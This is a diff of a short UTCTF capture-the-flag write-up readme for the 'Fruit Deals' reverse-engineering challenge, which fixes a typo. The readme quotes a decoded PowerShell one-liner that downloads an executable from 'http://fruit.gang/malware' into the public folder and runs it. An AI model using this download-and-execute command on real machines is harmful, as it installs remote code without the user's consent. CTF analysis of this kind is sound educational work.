S4L1Mabd/UTCTF-WriteUPS/Reverse/Fruit Deals/Solution/readme.md

 ![](Screenshot/P7.png)

-### So you can notive the the file name of the programme downloaded is in the "CNTA"
+### So you can notice that the file name of the programme downloaded is in the "CNTA"

 #### f = "poWeRsHELL -command "$oaK = new-object Net.WebClient;$OrA = 'http://fruit.gang/malware';$CNTA = 'banANA-Hakrz09182afd4';$jri=$env:public+'\'+$CNTA+'.exe';try{$oaK.DownloadFile($OrA, $jri);Invoke-Item $jri;break;} catch {}""